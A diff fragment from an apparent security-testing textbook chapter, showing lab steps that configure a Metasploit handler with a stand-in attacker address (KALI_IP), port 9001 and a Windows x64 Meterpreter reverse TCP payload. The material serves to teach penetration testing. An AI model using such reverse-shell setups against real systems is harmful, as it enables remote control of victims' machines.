dhammon/AttacksAndCountermeasures/textbook/10-SecurityTesting.md

 > set LHOST KALI_IP
 > set LPORT 9001
 > ```
 > Set the payload of the handler to the Windows x64 staged Meterpreter TCP setting we used when generating the EXE using Msfvenom.
+> ```
+> set payload windows/x64/meterpreter/reverse_tcp
+> ```
-Double check the settings and confirm the payload, LHOST, and LPORT are correct.
+> Double check the settings and confirm the payload, LHOST, and LPORT are correct.
 > ```
 > options
 > ```